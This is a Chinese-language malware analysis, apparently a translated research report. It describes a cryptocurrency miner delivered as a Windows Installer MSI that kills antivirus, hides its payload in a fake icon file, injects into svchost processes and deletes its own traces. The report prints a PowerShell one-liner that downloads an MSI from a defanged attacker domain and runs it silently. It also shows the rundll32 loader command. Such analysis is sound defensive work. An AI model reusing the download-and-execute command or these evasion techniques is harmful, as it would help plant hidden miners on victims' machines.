加密貨幣挖礦惡意軟件開(kāi)始使用一些包括Windows installer在內(nèi)的新的繞過(guò)技術(shù)。
加密貨幣挖礦惡意軟件數(shù)量不斷增長(zhǎng)的一個(gè)原因是其暴利性，另一個(gè)原因是可以在系統(tǒng)中不被檢測(cè)到，尤其是使用了不同的混淆技術(shù)后更難檢測(cè)。研究人員發(fā)現(xiàn)，攻擊者在不斷的向加密貨幣挖礦惡意軟件中添加混淆技術(shù)來(lái)繞過(guò)AV的檢測(cè)。
安裝器行為

圖1. 惡意軟件感染鏈
惡意軟件以Windows installer MSI文件的形式到達(dá)受害者機(jī)器，Windows installer MSI文件是一個(gè)用于安裝軟件的合法應(yīng)用程序。使用真實(shí)的Windows組件可以使其看著不那么可疑，而且可以繞過(guò)一些安全過(guò)濾器。
研究人員分析樣本的安裝過(guò)程發(fā)現(xiàn)，惡意MSI文件會(huì)將自己安裝到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server目錄下，如果用戶設(shè)備上不存在該目錄，就會(huì)創(chuàng)建該目錄。該目錄含有許多不同的文件，作為攻擊鏈的一部分：
· bat – 用于終止正在運(yùn)行的反病毒軟件的腳步文件
· exe – 用于解壓釋放在另一個(gè)目錄中的icon.ico文件的解壓工具
· ico – 密碼保護(hù)的zip文件，顯示為icon文件
解壓icon.ico后出現(xiàn)兩個(gè)文件：
· ocx – 加載器模塊，負(fù)責(zé)解密和安裝加密貨幣挖礦模塊
· bin – 加密的，UPX打包的，Delphi 編譯的加密貨幣挖礦模塊
安裝過(guò)程的另一部分包含在%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}中創(chuàng)建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預(yù)防惡意軟件API的檢測(cè)。如下所示的配置文件也會(huì)釋放到 %UserTemp%\[Random Number]文件夾中。

圖2. 挖礦機(jī)的配置文件
安裝過(guò)程使用的語(yǔ)言是Cyrillic而非英語(yǔ)，這或許暗示著惡意軟件來(lái)源的區(qū)域。

圖3. 安裝過(guò)程顯示窗口
進(jìn)程注入和監(jiān)視器創(chuàng)建
安裝后，在執(zhí)行以下命令前，ex.exe文件會(huì)解壓icon.ico文件：
 rundll32 default.ocx,Entry u
為注入代碼創(chuàng)建3個(gè)新Service Host (svchost.exe)進(jìn)程。前兩個(gè)SvcHost進(jìn)程起著監(jiān)視器的作用。當(dāng)注入的svchost進(jìn)程中止后，這兩個(gè)進(jìn)程負(fù)責(zé)通過(guò)powerShell命令重新下載Windows Installer (.msi)文件。
“powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”
然后將第三個(gè)SvcHost進(jìn)程注入到挖礦機(jī)模塊并使用下面的命令執(zhí)行：
“%system32%\svchost.exe –config={malware configuration path}

圖4. 第三個(gè)Service Host進(jìn)程
為了使用檢測(cè)和分析變得更難，惡意軟件還有自毀機(jī)制。首先，創(chuàng)建和執(zhí)行下面的文件：
 {Random Characters}.cmD 
然后刪除安裝目錄中的所有文件，并移除系統(tǒng)內(nèi)所有的安裝痕跡。
惡意軟件非常特別的一點(diǎn)是使用主流的Windows Installer builder WiX作為打包器，有點(diǎn)像一層反檢測(cè)層。這也說(shuō)明攻擊者在不斷努力來(lái)保證其創(chuàng)建活動(dòng)處于隱蔽狀態(tài)。